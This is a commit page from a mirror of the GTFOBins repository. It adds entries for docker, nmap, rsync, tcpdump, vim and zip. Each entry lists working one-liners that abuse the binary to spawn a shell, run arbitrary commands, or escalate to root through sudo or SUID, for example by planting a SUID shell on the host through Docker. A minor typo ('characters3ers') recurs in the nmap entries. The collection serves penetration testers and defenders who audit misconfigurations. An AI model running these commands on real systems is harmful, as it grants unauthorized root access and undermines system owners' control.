public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-12-25 22:40:10 +01:00
Code Issues Projects Releases Wiki Activity

Add: docker, nmap, rsync, tcpdump, vim and zip

Browse Source
This commit is contained in:
Andrea Cardaci 2018-08-19 11:52:44 +02:00
commit edd7fec5ff
6 changed files with 97 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
_gtfobins/docker.md Normal file
View File

@ -0,0 +1,19 @@
---
description: |
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group.
This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.
functions:
execute-interactive:
- code: |
docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
sudo-enabled:
- code: |
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
suid-enabled:
- code: |
./docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
---

18
_gtfobins/nmap.md Normal file
View File

@ -0,0 +1,18 @@
---
functions:
execute-non-interactive:
- description: Echoing of input characters3ers is disabled.
code: |
echo 'os.execute("/bin/sh")' > /tmp/script.nse
nmap --script=/tmp/script.nse
sudo-enabled:
- description: Echoing of input characters3ers is disabled.
code: |
echo 'os.execute("/bin/sh")' > /tmp/script.nse
sudo nmap --script=/tmp/script.nse
suid-enabled:
- description: Echoing of input characters3ers is disabled.
code: |
echo 'os.execute("/bin/sh -p")' > /tmp/script.nse
./nmap --script=/tmp/script.nse
---

9
_gtfobins/rsync.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
execute-interactive:
- code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
sudo-enabled:
- code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
suid-enabled:
- code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
---

17
_gtfobins/tcpdump.md Normal file
View File

@ -0,0 +1,17 @@
---
functions:
execute-non-interactive:
- code: |
COMMAND='id > /tmp/output'
TF=$(mktemp -u)
echo "$COMMAND" > $TF
chmod +x $TF
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
suid-enabled:
- code: |
COMMAND='id > /tmp/output'
TF=$(mktemp -u)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
---

19
_gtfobins/vim.md Normal file
View File

@ -0,0 +1,19 @@
---
functions:
execute-interactive:
- code: vim -c ':!/bin/sh'
- code: |
vim
:set shell=/bin/sh
:shell
file-write:
- code: |
vim file_to_write
w
file-read:
- code: vim file_to_read
suid-enabled:
- code: ./vim -c ':!/bin/sh -p'
sudo-enabled:
- code: sudo vim -c ':!/bin/sh'
---

15
_gtfobins/zip.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
execute-interactive:
- code: |
zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
rm /tmp/x.zip
sudo-enabled:
- code: |
sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
sudo rm /tmp/x.zip
suid-limited:
- code: |
./zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
sudo rm /tmp/x.zip
---